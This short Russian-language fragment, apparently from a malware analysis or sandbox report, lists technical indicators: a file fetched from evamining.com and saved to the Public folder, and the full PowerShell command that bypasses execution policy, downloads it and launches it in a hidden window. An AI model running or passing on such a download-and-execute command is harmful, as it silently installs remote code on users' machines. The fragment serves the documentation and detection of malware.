Техническая информация
- https://evamining.com/elber.exe как c:\users\public\u.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -nologo -noprofile -c IEX(new-object net.webclient).DownloadFile('https://evamining.com/elber.exe', 'c:\users\public\u.exe'); start-process 'C' (со скрытым окном)